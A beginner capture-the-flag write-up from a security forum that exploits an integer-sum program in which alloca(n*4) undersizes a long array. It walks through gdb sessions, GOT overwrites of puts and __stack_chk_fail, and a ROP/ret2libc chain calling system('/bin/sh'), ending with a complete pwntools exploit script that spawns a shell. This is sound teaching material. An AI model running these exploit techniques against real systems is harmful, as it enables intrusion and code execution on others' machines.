Punishing code with magic numbers with ROP and ret2libc on an x86_64
Difficulty: Beginner
CTF: /zer0pts/pwn/protude (ASLR is enabled here)
The vulnerable program
This program takes an integer N
and N
other integers as input. Then it calculates and prints the sum of these numbers.
A pretty standard exercise when you are learning a new programming language.
We are going to attempt to exploit it get RCE. Take a few moments to absorb the code before moving on.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
long n;
long read_long() {
char buf[32];
int readByte;
memset(buf, 0, sizeof(buf)); // sets memory to 0
readByte = read(0, buf, sizeof(buf)); // reads 32 bytes of input
if (readByte == 0) {
puts("[ERROR] read failed"); // no bytes read = exit()
exit(1);
}
return atol(buf); // convert input to long
}
void setup() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}
void calc_sum(void) {
long i;
long *array;
long result;
array = (long*)alloca(n * 4);
for(i = 0; 0 <= i && i < n; i++) {
printf("num[%ld] = ", i + 1);
array[i] = read_long();
}
for(result = 0, i = 0; i < n; i++) {
result += array[i];
}
printf("SUM = %ld\n", result);
}
int main() {
setup();
printf("n = ");
n = read_long();
if (n <= 0x00 || n > 22) { // size has to be 1-22
puts("Invalid input");
} else {
calc_sum();
}
return 0;
}
Setup
Let’s set up a few things before we start:
- Disable ASLR
echo 0 > /proc/sys/kernel/randomize_va_space
- Disable PIE (during compilation)
- Enable DEP (during compilation)
- Enable stack protector (during compilation)
The binary is provided to you here.
Static Analysis
Inspecting code that handles user input.
Let’s take a closer look at the user input function.
long read_long() {
char buf[32];
int readByte;
memset(buf, 0, sizeof(buf)); // sets memory to 0
readByte = read(0, buf, sizeof(buf)); // reads 32 bytes of input
if (readByte == 0) {
puts("[ERROR] read failed"); // no bytes read = exit()
exit(1);
}
return atol(buf); // convert input to long
}
We have a buffer of 32 bytes. read(0, buf, sizeof(buf))
reads at most 32 characters. Therefore, there is no way to overwrite the stack using read. : (
We have an interesting call to atol(buf)
at the end, but we cannot get anything out of it. The function will simply return 0
on any suspicious input.
Although the function implementation uses bad practices, we don’t have anything interesting going on.
Inspecting the function that calculates the sum.
void calc_sum(void) {
long i;
long *array;
long result;
array = (long*)alloca(n * 4);
for(i = 0; 0 <= i && i < n; i++) {
printf("num[%ld] = ", i + 1);
array[i] = read_long();
}
for(result = 0, i = 0; i < n; i++) {
result += array[i];
}
printf("SUM = %ld\n", result);
}
If you are unfamiliar with alloca
, man 3 alloca
to check the manual page for it.
The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller
alloca
allocates memory in the stack frame of the caller, in this case, calc_sum
.
This is an interesting choice. Usually, people use malloc
to allocate space at runtime. But in this case, since n
is bound to 1-22, it is not too bad. Too much stack space is not used.
Then, N integers that are read from read_long()
are placed in the memory we allocated.
The sum is calculated and the result is printed. Not too much going here as well.
If you want to figure out the vulnerability on your own, stop here.
Introducing magic numbers
The term magic number or magic constant refers to the anti-pattern of using numbers directly in source code
The use of magic numbers is often frowned upon. They make your code difficult to understand and often introduce subtle bugs.
Take a look at the following piece of code from Wikipedia.
for i from 1 to 52
j := i + randomInt(53 - i) - 1
a.swapEntries(i, j)
52 and 53 (and most other numbers which has no meaning in local context) is a magic number.
In this above case, the only problem this poses is a slight annoyance over the mysterious 52. Cases like the following, however, may create portability issues.
const int array_size = 20;
int *ptr = (int*) malloc(array_size * 4);
Here, 4 is the magic number. The peice of code above executes properly in systems where the sizeof (int) == 4
. But if it is 2, it breaks miserably when we attempt to use ptr
.
If we were to write this properly, we would use something like.
const int array_size = 20;
int *ptr = (int*) malloc(array_size * sizeof (int));
Okay, now you are equipped with the knowledge of magic numbers! Let us approach this problem again.
Finding an arbitrary write.
Take a look at:
array = (long*) alloca(n * 4);
This is the exact portability issue that we discussed earlier.
Only sizeof(char)
is fixed as 1 by the C standard. Everything else usually only has minimum size requirements. The compiler can choose whatever size it sees is the best.
Usually, in x86_64 compilers make the sizeof(long) == 8
. This is convenient because a long
will fit in a register.
In this case, sizeof(long) == 8
So we have allocated space like alloca(n * 4);
yet the sizeof(long) == 8
(In x86_64, this is usually the case).
Therefore, we are only allocating enough memory for n/2
longs. Yet, we access all n
of them. We are accessing memory not allocated for us! Also, we can write to that memory.
Even more convenient is the fact that alloca
was used. The extra memory we are addressing is on the stack.
The stack frame will usually look like this for the calc_sum
function.
-----------------------------------------
| Arguments to the function |
-----------------------------------------
| Return Address |
-----------------------------------------
| Local variables of calc_sum |
-----------------------------------------
| Alloca(n*4) buffer |
-----------------------------------------
We can potentially overwrite the local variable array
to achieve arbitrary write!
Exploiting the arbitrary write once.
Let’s fire up gdb:
gdb-peda$ r
n = 21
num[1] =
num[2] =
num[3] =
num[4] =
...
num[15] =
num[2] =
We use n = 21. Note that n is restricted to 1-22 (re-read the code if you are confused).
I just pass it empty strings so that num[1]
through num[15]
will be equal to 0.
We notice that after num[15]
, we loop back to num[2]
.
We have overwritten the local variable i
!
Since we have overwritten the local variable i
with 0, we again start the loop from 2. (i++ is done at the end and printf() uses i+1).
We are looping indefinitely.
But, looping indefinitely is not useful to us.
To write to memory beyond this, we override the i
with 14 (exactly the current index).
So that in the next iteration we get to num[16]
.
gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] =
We can now write past the limit and override *array
in the next iteration! Then write to *(array+n)
in the iteration after that!. That means since we control array
we can write to anywhere we wish.
Let’s try to override the printf
’s GOT entry to point to the puts()
call in the code to test things.
First, we get the GOT entry of printf
.
gdb-peda$ x/i printf
0x400690 <printf@plt>:
jmp QWORD PTR [rip+0x20099a] #0x601030
0x601030
is the GOT offset of printf
We then get the location where the puts
call is made.
gdb-peda$ disass read_long
Dump of assembler code for function read_long:
0x00000000004007c7 <+0>: push rbp
0x00000000004007c8 <+1>: mov rbp,rsp
...
0x0000000000400813 <+76>: lea rdi,[rip+0x28a] # 0x400aa4
0x000000000040081a <+83>: call 0x400660 <puts@plt>
...
End of assembler dump.
0x000000000040081a
is the place we want the GOT offset to point to.
So we override the value at 0x601030
with 0x000000000040081a
gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] =
num[17] = 6295464
num[18] = 4196378
num[%ld] =
[Inferior 1 (process 16567) exited with code 01]
As you can see, num[%ld] =
was printed without formatting. Awesome.
printf@plt
jumped to call puts@plt
(and the call exit@plt
next).
But wait a minute…
The careful reader might have noticed,
0x601030 = 6295600
But we have used, 6295464
in gdb which is 0x601030 - 17*8
Why so?
This is because in the next iteration we override the value at array[17]
not array[0]
therefore we correct the address by subtracting with 17 * sizeof(long)
With this, we have achieved arbitrary write!!
As of right now, we can only overwrite to memory once. But, it is still a step in the right direction.
Overwriting to memory more than once.
In order to overwrite to arbitrary memory more than once, we need to find a way to jump to the top of the calc_sum()
function whenever we want.
We will do this with a GOT entry overwrite.
Take a look at the following code from read_long
.
readByte = read(0, buf, sizeof(buf)); // reads 32 bytes of input
if (readByte == 0) {
puts("[ERROR] read failed"); // no bytes read = exit()
exit(1);
}
Bring up the man page of read
: man 2 read
.
On success, the number of bytes read is returned (zero indicates the end of file)
The if block only executes when we provide EOF to the input stream. If we overwrite either the puts
or the exit
GOT entry to point to the top of the calc_sum
function, we can send an EOF to jump to the top of the function. This will allow us to overwrite regions of memory multiple times.
The relevant info:
calc_sum = 0x40088e = 4196494
puts@got = 0x601018
Again, we need to overwrite the correct address so we correct the address 0x601018
so that array[17]
will point to 0x601018
0x601018 - 17*8 = 6295440
gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] =
num[17] = 6295440
num[18] = 4196494
num[19] = num[1] =
I used CTRL + D
to send a EOF to the terminal. We can see the output num[1]
. We jumped to the start of the calc_sum
again!
We can use this to overwrite to memory any number of times.
ROP and ret2libc
In this challenge, we have DEP and stack cookies that protect executing stack space and checking if the stack frame has been overwritten.
Most of the time, we do not have a space in a process that is both writable and executable.
For instance let’s check for our current executable.
[gnik@tinybot ~/]$ ./thebinary &
n =
[gnik@tinybot ~/]$ ps aux | grep thebinary
gnik 16890 0.0 0.0 10696 1040 pts/1 t 16:01 0:00 /home/gnik/thebinary
[gnik@tinybot ~/]$ pmap 16890
16890: /home/gnik/thebinary
0000000000400000 4K r-x-- thebinary
0000000000600000 4K r---- thebinary
0000000000601000 4K rw--- thebinary
00007ffff73ba000 104K r-x-- libpthread-2.27.so
00007ffff73d4000 2044K ----- libpthread-2.27.so
00007ffff75d3000 4K r---- libpthread-2.27.so
00007ffff75d4000 4K rw--- libpthread-2.27.so
00007ffff75d5000 16K rw--- [ anon ]
00007ffff75d9000 12K r-x-- libdl-2.27.so
00007ffff75dc000 2044K ----- libdl-2.27.so
00007ffff77db000 4K r---- libdl-2.27.so
00007ffff77dc000 4K rw--- libdl-2.27.so
00007ffff77dd000 1948K r-x-- libc-2.27.so
00007ffff79c4000 2048K ----- libc-2.27.so
00007ffff7bc4000 16K r---- libc-2.27.so
00007ffff7bc8000 8K rw--- libc-2.27.so
00007ffff7bca000 16K rw--- [ anon ]
00007ffff7bce000 24K r-x-- libgtk3-nocsd.so.0
00007ffff7bd4000 2044K ----- libgtk3-nocsd.so.0
00007ffff7dd3000 4K r---- libgtk3-nocsd.so.0
00007ffff7dd4000 4K rw--- libgtk3-nocsd.so.0
00007ffff7dd5000 156K r-x-- ld-2.27.so
00007ffff7fbe000 16K rw--- [ anon ]
00007ffff7ff7000 12K r---- [ anon ]
00007ffff7ffa000 8K r-x-- [ anon ]
00007ffff7ffc000 4K r---- ld-2.27.so
00007ffff7ffd000 4K rw--- ld-2.27.so
00007ffff7ffe000 4K rw--- [ anon ]
00007ffffffde000 132K rw--- [ stack ]
ffffffffff600000 4K r-x-- [ anon ]
total 10700K
As you can see, none of them have both the write and execute bit set.
This is a pretty common security measure, so we cannot write shellcode to a certain memory region and jump to it.
This is where ret2libc and ROP come into play.
With ret2libc we are jumping to certain points in the libc library that is loaded at runtime. For instance, we can jump to potentially dangerous places like system()
which is present in libc
.
With ROP we jump to small code segments in the address space of the process that does a certain task before jumping to a different segment. Chaining a bunch of these ROP gadgets can hence be very powerful.
Our plan to achieve RCE is as follows:
- Find the address of system() in libc
- Find the address of the string '/bin/sh/` lin libc
- Find a ROP gadget that can place the address of the
/bin/sh
string in the rdi register. - Jump to system()
Finding the address of system() and the string ‘/bin/sh’ is pretty straight forward.
gdb-peda$ start
....
Temporary breakpoint 1, 0x00000000004009bd in main ()
gdb-peda$ p system
$1 = {int (const char *)} 0x7ffff782c440 <__libc_system>
gdb-peda$ info proc map
process 17653
Mapped address spaces:
Start Addr End Addr Size Offset objfile
.......
.......
0x7ffff77dd000 0x7ffff79c4000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff79c4000 0x7ffff7bc4000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7bc4000 0x7ffff7bc8000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7bc8000 0x7ffff7bca000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7bca000 0x7ffff7bce000 0x4000 0x0
0x7ffff7bce000 0x7ffff7bd4000 0x6000 0x0 /usr/lib/x86_64-linux-gnu/libgtk3-nocsd.so.0
.......
.......
gdb-peda$ find '/bin/sh' 0x7ffff77dd000 0x7ffff79c4000
Searching for '/bin/sh' in range: 0x7ffff77dd000 - 0x7ffff79c4000
Found 1 results, display max 1 items:
libc : 0x7ffff7990e9a --> 0x68732f6e69622f ('/bin/sh')
The system() function is present in 0x7ffff782c440
Address of the string ‘/bin/sh’ is 0x7ffff7990e9a
These addresses are most likely different for your machine
Learning to write exploit scripts.
Sufficient knowledge of python is assumed, although not necessary to understand this section.
There are a lot of ways to write your exploit scripts.
I will keep things simple and write one in using python3
and pwntools
We will do everything we have done so far with gdb in python.
Create a new python script.
import pwn
import tty
You can install pwntools
with pip and import pwn
to work with it. We will also be using some constants from tty
p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)
# g = pwn.gdb.attach(p, """
# """)
This is how you start a local process in pwntools
. Note the raw = False
and stdin=pwn.PTY
!
These options are essential to our current project since we write EOF to stream and not close our stream. (Yes this sounds weird, but this is necessary.)
You can experiment with attaching the debugger by uncommenting some lines here.
def setup():
p.sendline('21')
def write_junk(count):
for x in range(count):
p.sendline('')
def overwrite_memory(addr, data):
p.sendline('14')
p.sendline('')
p.sendline(str(addr))
p.sendline(str(data))
def send_eof():
"""
Note Send EOF sends 2 bytes!!!
"""
p.sendline(chr(tty.CEOF))
These are some of the functions that will be useful to us. The functions are self-explanatory. If you have never written an exploit before with pwntools, feel free to experiment here. p.sendline()
is used to send a line to the process.
setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()
p.interactive()
Okay, so now that all that is over, we will first overwrite the GOT entry of puts
with calc_sum
so that we can use EOF to jump to it again. Our nifty little overwrite_memory()
function makes this easier.
The p.interactive()
at the end is used to make the process interactive. After this, you can use the terminal for IO.
I recommend you experiment with the script.
Things that are necessary for the exploit to work.
These are some things that will be useful to us as we move on to ROP.
- Overwrite the GOT entry of
__stack_chk_fail
to point to theleaveq; ret
instruction incalc_sum
to bypass stack smashing check. - Overwrite the value of n to 30 so that we can overwrite more memory at once. (This is used in the ROP step later)
I will not show this in gdb since I have already shown you how to overwrite arbitrary memory, and the writeup will be pretty repetitive if I include this.
If you are confused, please refer to the code snippet below from the exploit script.
"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()
"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()
Finding the necessary ROP gadgets
I use ROPgadget tool to find the necessary ROP gadgets from the executable. You can use the plethora of alternatives available to you. (gdb-peda also has one!)
[gnik@tinybot ~/]$
ROPgadget --binary thebinary
...
0x0000000000400a83 : pop rdi ; ret
...
0x0000000000400646 : ret
...
Unique gadgets found: 112
We will need two ROP gadgets, pop rdi; ret
and ret
.
pop rdi; ret
to load the address of the string into the rdi
register and then ret
gadget to align the stack address for the movqs
instruction. (The reason this is necessary is left as an exercise.)
Writing the final exploit script.
We finally have all the tools that we need to write a final exploit script.
The final exploit script looks something like.
import pwn
import tty
p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)
#g = pwn.gdb.attach(p, """
#b *0x00000000004009b8
#c
#""")
def setup():
p.sendline('21')
def write_junk(count):
for x in range(count):
p.sendline('')
def overwrite_memory(addr, data):
p.sendline('14')
p.sendline('')
p.sendline(str(addr))
p.sendline(str(data))
def send_eof():
"""
Note Send EOF sends 2 bytes!!!
"""
p.sendline(chr(tty.CEOF))
setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()
"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()
"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()
"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))
# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))
# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))
# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()
Most of the script has already been discussed.
Let us focus on the rest that remains.
"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))
# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))
# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))
# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()
The first question that needs to be answered: Why have some constants changed?
write_junk(13)
was used while overwriting memory the last time why is write_junk(17)
used this time?
This is due to the fact that n = 21
in all previous cases but we have just recently overwritten n = 30
so that we can overwrite more of the stack. Hence, the offsets at which the local variable i
is overwritten has changed.
You can experiment with the same method used above to figure out the offset when n = 30.
Okay, now let’s discuss the ROP part of the exploit.
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))
# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))
# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))
# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
To set up our exploit, we overwrite the stack to the point where we can overwrite the return address.
We then place the address of the pop rdi; ret
ROP gadget followed by the address to the /bin/sh
string.
When the function returns, it jumps to execute pop rdi; ret
. Since the address of the string is on the stack, pop rdi
places the address of the string in the rdi register. And then we ret
to another address…
… The address we jump to is the address of ret
instruction. ret
gadget is used to align our stack. (This is necessary since movaps instruction (used by system()) needs the stack to be 16 bit aligned.). ret
is a NOP in ROP (a gadget that does nothing).
Note that this might not be necessary if your stack is already 16 bit aligned.
We then place the address of the system call on the stack. The ret
gadget then pops this address off the stack and then jumps to system() in libc.
We have successfully placed the address of the string ‘/bin/sh’ in rdi
and then jumped to system()!
Wait… There is more…
Remember we overwrote the GOT entry of __stack_chk__fail so that the stack cookie check would unconditionally return to leaveq; ret
Since we have overwritten the return address, we have surely overwritten the stack cookie.
Therefore, if we hadn’t overwritten the GOT entry of __stack_chk_fail
our exploit would have failed.
We can also overwrite a GOT entry and jump using that to avoid this.
Putting it all together
[gnik@tinybot ~/]$ python3 exploit.py
[+] Starting local process './thebinary': pid 18969
[*] Switching to interactive mode
n = 21
....
....
SUM = -3105548685935727921
$ $ whoami
whoami
gnik
This is my first post here in 0x00sec, so any feedback would be helpful. In an upcoming writeup, we will exploit the same executable but with ASLR enabled. : )